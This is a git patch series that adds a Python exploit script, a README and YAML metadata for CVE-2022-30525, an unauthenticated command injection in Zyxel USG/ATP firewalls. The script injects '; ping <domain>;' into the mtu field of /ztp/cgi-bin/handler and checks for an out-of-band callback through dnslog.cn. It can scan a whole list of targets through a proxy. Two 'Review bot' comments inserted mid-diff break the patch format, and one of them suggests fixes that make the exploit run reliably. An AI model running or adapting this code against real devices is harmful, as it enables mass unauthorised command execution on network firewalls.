From d165efb9a1d3909efe94ae407581db4f505a14d9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9C=88=E4=BA=AE=E5=92=8C=E5=A4=AA=E9=98=B3?= Date: Thu, 23 Mar 2023 15:13:06 +0800 Subject: [PATCH 1/2] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-30525?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .DS_Store | Bin 0 -> 8196 bytes cve/.DS_Store | Bin 0 -> 6148 bytes cve/Zyxel/.DS_Store | Bin 0 -> 6148 bytes cve/Zyxel/2022/.DS_Store | Bin 0 -> 6148 bytes .../2022/CVE-2022-30535/CVE-2022-30525.py | 119 ++++++++++++++++++ cve/Zyxel/2022/CVE-2022-30535/README.md | 30 +++++ cve/Zyxel/2022/yaml/CVE-2022-30525.yaml | 19 +++ openkylin_list.yaml | 2 + 8 files changed, 170 insertions(+) create mode 100644 .DS_Store create mode 100644 cve/.DS_Store create mode 100644 cve/Zyxel/.DS_Store create mode 100644 cve/Zyxel/2022/.DS_Store create mode 100644 cve/Zyxel/2022/CVE-2022-30535/CVE-2022-30525.py create mode 100644 cve/Zyxel/2022/CVE-2022-30535/README.md create mode 100644 cve/Zyxel/2022/yaml/CVE-2022-30525.yaml 
diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..d7aa354b0703b6d995a4434011fde166e69e8909 GIT binary patch literal 8196 zcmeHMTWl0n7(U;$&>1?=0a{tG1Dh^Hz!pktZMh}en{qF*E!~#Ovb!_Vf!Ud|GrKL8 zn#RNz5RFe7Z;>Z&kp~qezWAUh`lx7vF~(pt>We1$qVnKBb7m=RA-))+I47C&pZ|8w z{Qvp>nLV?NF?1BPb&N$AVmT^8qjz^CpaYyHE>s=+!etQ1KgeD(ZDVq&HI#A>$Pn&QyQl;dkuXgrBrv?mYX&#J?}dhnocJB`wdI8M>_0+r8&NDf-6Kxlu}A$ zY^=Gdu|B%4sd>CUI=0>$x3t_lJ}!whv9%lbq>h?7%Rb2iK=2S?bEgG#YBCzrDR%O& z5oL+YFpuWTQZ&+>N_no@pBxz6C#RGJMY`>tVb`!NXRn@jh^CY(hr-*MwXNNG-P8AH zZL^TGoRl&@n>MorGwtf_rkOAv(n(h3Wb?LZ?zSDnn`R*C>Z7iwo1sb$I(FXe^e0Oi zG(Wde3XZ-X-bGV8)zdSKz@;i>{(^;ajXX$sv|Qss zL(dPSovdzYhIP1a#L(QK{-WU+8B_1I(m7q4k9z4+Rb=s!J8M;y8%#QsOp}F-ajamt z$Ca2U`fEhhI(ffF_q5a2yj3(&IY;x*>MPVbb)To{%AeP%kNo06jOb=u?&YJZXEUsASn;byr;O=j&}jzV-KE^Aji)q~!$ zJJOEZGpt+QEnVcg`$#wF45jmW&jRAGxVEpPZ0xF2)d6q1c1`nR zSQ1%Wr6$xqQTbF%DT-kg4FWxFE62VVi|4-acPAEK&37qQ+AKfOv3MirC3>l;tci88 z9qbUxvoUs>JtA^V(t&33=5qXKhKiE1pta@3;*t!Tq~bf5>ju?Gq4 z#}Eu0frC*T#~4oFQJlmnoW|pL3eV#OyofV+6>s28oWt9A4;S$xS7A&fspD1QP^;u$=P z=LqR9;bpvn*YG;w{2iRfyLcZT-~v7h5dRh7{U=ZU5Ty^8sF;K=bg2qbRDA0Yo6T%r@jky qQ$7R`fBg?b8b`_0^N9y^f>V-E`^P^7{Php*@ckdY|9x!U&fTBX5oNOg literal 0 HcmV?d00001 diff --git a/cve/.DS_Store b/cve/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..a6355d098d01e0a31d7ee873c2d21b2a8f6ad048 GIT binary patch literal 6148 zcmeHK+e*Vg5Z$${O({Yi6#5wOwO}t)5MM&9KVU?`3pF7@gE3p0)F`EpXZ<0+#P4xt zcLOa3A4Tj8?4H@V>}C#RFN`tn%!58-CS%NihR9K=5Hwf1wsbHemvh8^o=*K(_!ZOq zO%r~5gI%##_QFE8`u!jNG>+1&*ZbsKwR&T_X*7+taqB*a+|9gfo;u#_8b{|s#D1xJ z{zVk#6La@OB$*c_;Y=n(K?or?mr)Xk+!6C6NM)|897fA%P0Y?>F&y-|R(~*DcCEz` z>Z8%&a@jKW_79HFCXew`BHk2{92l3fqp^f{P*y5>c4tW}l6$b08D%6PF+dCu1H`~) zGN8``qrI8sQ`N)(G4KNexIb9X5N(ZxLb-K7hu3HH*AY=b$F~HcrP0<{CbTlFH`x* zUr(VCF+dFbGX{8l?2a8MN}sLY%EPnPf_4WD1>*`-KtNx+1i%3Ik&bjKzlA!)*%}Ll UI1AckIv`yHBq7uh1HZt)7oGV^;s5{u literal 0 HcmV?d00001 
diff --git a/cve/Zyxel/.DS_Store b/cve/Zyxel/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..586237459d3d61e9d30161b2348bb984b7258f0e GIT binary patch literal 6148 zcmeHK%}T>S5Z<-XrW7Fug&r5Y7EG!Y#7l_v1&ruHr6#0kFlI}W+CwSitS{t~_&m<+ zZp31}ir5*L{bqJ%cC#O3e;8vtm?j=$4r9y)MdWC#5bRzV+Azt89LI=f#W>Dn4E~#m z{dK@^w^)z4puMl(ACI%NC|&oRZ#1mUt)|_y+xBhvAZKA2mD3`KCfDd)NSVd89mSXF zXf||qPGw$3X+D~$f;1UH%FR`pCvq0ZX`U3SHq-&TWw(Y-XFm5154yth+(lQ+k9%%c z^!rDPMa$mZ+dnxUK4wq3e9?q*;9JSI!5Ut{_*~C(ILR}a-$P%WU*{1L1H=F^Kn$!e z1LjPy+v`gKt(+Jj27X`w_Xh!r=o_pws;vVWygp;xLPP-@-x7$zpl`6!2oVsjO96E$ zH%|<%%b{PGJl|lYQI|8WW`=Rh%=P1itJ$GnsC34CjnonY#K1BG4edI3{-41wv+|L@ zTtXf(Kn(md2Dmi{2LUX~oUPxMhi9z-y#qzTyb28vu$L|Y;NU*eQ9&ISXhWWFu+oU5 TV81E{q>F$egc@St7Z~^es>w)y literal 0 HcmV?d00001 diff --git a/cve/Zyxel/2022/.DS_Store b/cve/Zyxel/2022/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..df4051b002d19d2094d950b9dcd090d3307a19ea GIT binary patch literal 6148 zcmeHK%}N6?5T3NvZYfF+3OxqAR@}B$5HCxAUci-lP^r7L=;C%$`r{&{uxEWCpTy^J zCP|C6{@g^`%rg0s$xN2{vLrhI!0MB38K3|F7Aj#Xhs_s4^Q0@1(v}P&lWSDKh6+B1 zP+jphhX2R_?cFXkpbahDwU7H}Lk)Ma=EtLf9||A+Uj0EBjK;S8#!~6b)^^s)T6ycn zy%(`N_QsP@-5Xxf=t79lpZ7h#9rWT(VXq;gu@^+Wp$rJRJ#@Lg45F@x>tYghM>5t` z6IRa3bqdAlw0vAG@p9RomH70uVwZTWb~2mgto?(dv-8eF*pI}sB9`GdC}l_E9A2>V zV~&sRFbYLbeG&Y&bfx3J0c( z52oMDbcMp?+i`s^-GMm@O=}o13@kH{R>K0_|E=%q|K%VvG7K07)`|g^X}ZlirljxI ymE`EI<*2u)B;=PUT!dgpUd8B3S8)+l3feh!5FL$)LbRZm9|1{&X$%8@%D_9sg@z9R literal 0 HcmV?d00001 diff --git a/cve/Zyxel/2022/CVE-2022-30535/CVE-2022-30525.py b/cve/Zyxel/2022/CVE-2022-30535/CVE-2022-30525.py new file mode 100644 index 00000000..a2b09db6 --- /dev/null +++ b/cve/Zyxel/2022/CVE-2022-30535/CVE-2022-30525.py 
@@ -0,0 +1,119 @@ +#!/usr/bin/env python +# -*- conding:utf-8 -*- +import requests +import argparse +import sys +import urllib3 +import json +import time +import random +import signal + +dnslog_res = requests.session() +urllib3.disable_warnings() + +__desc__ = 'CVE-2022-30525利用dnslog批量验证' +__author__ = 'savior' +__date__ = '2022/05/14' +__version__ = 'v0.1' +__link__ = 'https://github.com/savior-only/CVE-2022-30525' + + +def banner(): + print(""" + ██████ ██ ██ ████████ ████ ████ ████ ████ ████ ████ ██████ ████ ██████ + ██░░░░██░██ ░██░██░░░░░ █░░░ █ █░░░██ █░░░ █ █░░░ █ █░░░ █ █░░░██░█░░░░ █░░░ █░█░░░░ + ██ ░░ ░██ ░██░██ ░ ░█░█ █░█░ ░█░ ░█ ░ ░█░█ █░█░█████ ░ ░█░█████ +░██ ░░██ ██ ░███████ █████ ███ ░█ █ ░█ ███ ███ █████ ███ ░█ █ ░█░░░░░ █ ███ ░░░░░ █ +░██ ░░██ ██ ░██░░░░ ░░░░░ █░░ ░██ ░█ █░░ █░░ ░░░░░ ░░░ █░██ ░█ ░█ █░░ ░█ +░░██ ██ ░░████ ░██ █ ░█ ░█ █ █ █ ░█░█ ░█ █ ░█ █ █ ░█ + ░░██████ ░░██ ░████████ ░██████░ ████ ░██████░██████ ░ ████ ░ ████ ░ ████ ░██████░ ████ + ░░░░░░ ░░ ░░░░░░░░ ░░░░░░ ░░░░ ░░░░░░ ░░░░░░ ░░░░ ░░░░ ░░░░ ░░░░░░ ░░░░ + + + by {} {} + {} + """.format(__author__, __version__, __link__)) + + +class Dnslog: + + def get_dnslog(): + t = random.random() + url = f"http://www.dnslog.cn/getdomain.php?t={t}" + res1 = dnslog_res.get(url=url, proxies=proxies) + if res1.status_code == 200 and "dnslog" in res1.text: + dnslog = res1.text + return dnslog + else: + print("获取dnslog失败") + + + def get_data(): + t = random.random() + url = f"http://www.dnslog.cn/getrecords.php?t={t}" + res2 = dnslog_res.get(url=url, proxies=proxies) + return res2.text + +class information(object): + + def __init__(self,args): + self.args = args + self.url = args.url + self.file = args.file + + def target_url(self): + target_url = self.url + "/ztp/cgi-bin/handler" + headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0", + "Content-Type": "application/json" + } + dnslog = Dnslog.get_dnslog() + data = {"command": 
"setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "mtu": f"; ping {dnslog};", "data": "hi"} + try: + res = requests.post(url=target_url, headers=headers, data=json.dumps(data), verify=False, proxies=proxies, timeout=5) + except Exception as e: + pass + + time.sleep(5) + data = Dnslog.get_data() + if dnslog in data: + print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在Zyxel 防火墙未经身份验证的远程命令注入\033[0m") + print("[" + "-"*100 + "]") + else: + print(f"[\033[31mx\033[0m] 目标系统: {self.url} 不存在Zyxel 防火墙未经身份验证的远程命令注入!") + print("[" + "-"*100 + "]") + + def file_url(self): + with open(self.file, "r") as urls: + for url in urls: + url = url.strip() + if url[:4] != "http": + url = "http://" + url + self.url = url.strip() + information.target_url(self) + + +if __name__ == "__main__": + try: + banner() + parser = argparse.ArgumentParser(description='Zyxel 防火墙未经身份验证的远程命令注入', add_help=False) + parser.add_argument("-h", "--help", action="help", help="Show this help message and exit") + parser.add_argument("-u", "--url", type=str, dest="url", help="Target url eg:\"http://127.0.0.1\"") + parser.add_argument("-f", "--file", dest="file", help="Targets in file eg:\"url.txt\"") + parser.add_argument("-proxy", dest="proxy", help="Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)") + args = parser.parse_args() + if args.proxy: + proxies = {"http": args.proxy, "https": args.proxy} + print("\033[31m[+] use proxy: {}\033[0m".format(args.proxy)) + if args.url: + information(args).target_url() + elif args.file: + information(args).file_url() + #检测ctrl+c + except KeyboardInterrupt: + print("\n\033[31mYou choose to stop me.\033[0m") + + + + diff --git a/cve/Zyxel/2022/CVE-2022-30535/README.md b/cve/Zyxel/2022/CVE-2022-30535/README.md new file mode 100644 index 00000000..1a19e2e4 --- /dev/null +++ b/cve/Zyxel/2022/CVE-2022-30535/README.md 
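Review bot: `proxies` is read in `Dnslog.get_dnslog`, `Dnslog.get_data` and `information.target_url` but is only ever assigned under `if args.proxy:` in the `__main__` block, so any run without `-proxy` stops with `NameError` at the first `Dnslog.get_dnslog()` call; add `proxies = None` just before `if args.proxy:` (requests accepts `None` as "no proxy"). `get_dnslog` returns `None` when the lookup fails (it only prints), after which `target_url` formats `None` into the request body and evaluates `if dnslog in data` against a `str`, which raises `TypeError`; guard with `if not dnslog: return` right after the call. The `except Exception as e: pass` around `requests.post` also hides connection errors and timeouts, so an unreachable host is printed as not affected — log `e` or report the target as unreachable instead of falling through to the DNS check. Smaller points: the coding cookie is misspelled (`conding`, so it is not recognised), `signal` is imported but unused, `file_url` should call `self.target_url()` rather than `information.target_url(self)`, and the `Dnslog` methods take no `self` and should be marked `@staticmethod`. Unrelated to this hunk but in the same commit: the directory `cve/Zyxel/2022/CVE-2022-30535/` does not match the file name and ID `CVE-2022-30525` (looks like a typo), and four `.DS_Store` files are added of which PATCH 2/2 removes only `cve/.DS_Store`.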
@@ -0,0 +1,30 @@ +# CVE-2022-30525 +Zyxel 防火墙未经身份验证的远程命令注入 + +## 影响版本 + +### 影响组件 + +USG FLEX 100, 100W, 200, 500, 700 +USG20-VPN, USG20W-VPN +ATP 100, 200, 500, 700, 800 + +### 固件版本 + +ZLD5.00 thru ZLD5.21 Patch 1 +ZLD5.10 thru ZLD5.21 Patch 1 +ZLD5.10 thru ZLD5.21 Patch 1 + +## update + +-proxy + + + +## From +https://github.com/Henry4E36/CVE-2022-30525 + + +# ⚠️ 免责声明 + +此工具仅作为网络安全攻防研究交流,请使用者遵照网络安全法合理使用! 如果使用者使用该工具出现非法攻击等违法行为,与本作者无关! diff --git a/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml b/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml new file mode 100644 index 00000000..6fb3992d --- /dev/null +++ b/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml @@ -0,0 +1,19 @@ +id: CVE-2022-30525 +source: https://github.com/savior-only/CVE-2022-30525 +info: + name: Zyxel 防火墙未经身份验证的远程命令注入。 + severity: critical + description: + A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. + scope-of-influence: + firmware versions 5.00 ~ 5.21 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2022-30525 + - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-30525 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-30525 + cnvd-id: None + kve-id: None + tags: cve2022, Vendor Advisory, VDB Entry, firmware diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 525f67ac..d0af7b2e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml 
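Review bot: `tags: cve2022, Vendor Advisory, VDB Entry, firmware` mixes NVD reference-type labels (`Vendor Advisory`, `VDB Entry`) into the tag list; they describe the reference links, not the vulnerability, so the line should drop them, e.g. `tags: cve2022, firmware`, or use whatever tag vocabulary the other records in this repository follow. `scope-of-influence: firmware versions 5.00 ~ 5.21` also disagrees with the `description` field above it, which gives 5.00 or 5.10 through 5.21 Patch 1 depending on product and 4.60 through 5.21 Patch 1 for the VPN series; either widen it to `firmware versions 4.60 ~ 5.21 Patch 1 (lower bound varies by product, see description)` or list the per-product ranges. `cnvd-id: None` and `kve-id: None` are the YAML string `"None"`, not a null value — fine if the rest of the repository uses that convention, otherwise an empty value or `~` is the usual form.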
@@ -131,6 +131,8 @@ cve: - CVE-2022-31692 Zimbra: - CVE-2022-27925 + Zyxel: + - CVE-2022-30525 cnvd: apache-tomcat: - CNVD-2020-10487 -- Gitee From 70f877e3095b3d3fc82ce13478106e94cd3d2655 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9C=88=E4=BA=AE=E5=92=8C=E5=A4=AA=E9=98=B3?= Date: Thu, 23 Mar 2023 16:01:14 +0800 Subject: [PATCH 2/2] add cwe-id --- cve/.DS_Store | Bin 6148 -> 0 bytes cve/Zyxel/2022/yaml/CVE-2022-30525.yaml | 1 + 2 files changed, 1 insertion(+) delete mode 100644 cve/.DS_Store diff --git a/cve/.DS_Store b/cve/.DS_Store deleted file mode 100644 index a6355d098d01e0a31d7ee873c2d21b2a8f6ad048..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHK+e*Vg5Z$${O({Yi6#5wOwO}t)5MM&9KVU?`3pF7@gE3p0)F`EpXZ<0+#P4xt zcLOa3A4Tj8?4H@V>}C#RFN`tn%!58-CS%NihR9K=5Hwf1wsbHemvh8^o=*K(_!ZOq zO%r~5gI%##_QFE8`u!jNG>+1&*ZbsKwR&T_X*7+taqB*a+|9gfo;u#_8b{|s#D1xJ z{zVk#6La@OB$*c_;Y=n(K?or?mr)Xk+!6C6NM)|897fA%P0Y?>F&y-|R(~*DcCEz` z>Z8%&a@jKW_79HFCXew`BHk2{92l3fqp^f{P*y5>c4tW}l6$b08D%6PF+dCu1H`~) zGN8``qrI8sQ`N)(G4KNexIb9X5N(ZxLb-K7hu3HH*AY=b$F~HcrP0<{CbTlFH`x* zUr(VCF+dFbGX{8l?2a8MN}sLY%EPnPf_4WD1>*`-KtNx+1i%3Ik&bjKzlA!)*%}Ll UI1AckIv`yHBq7uh1HZt)7oGV^;s5{u diff --git a/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml b/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml index 6fb3992d..401981c4 100644 --- a/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml +++ b/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml @@ -14,6 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-30525 + cwe-id: CWE-78 cnvd-id: None kve-id: None tags: cve2022, Vendor Advisory, VDB Entry, firmware -- Gitee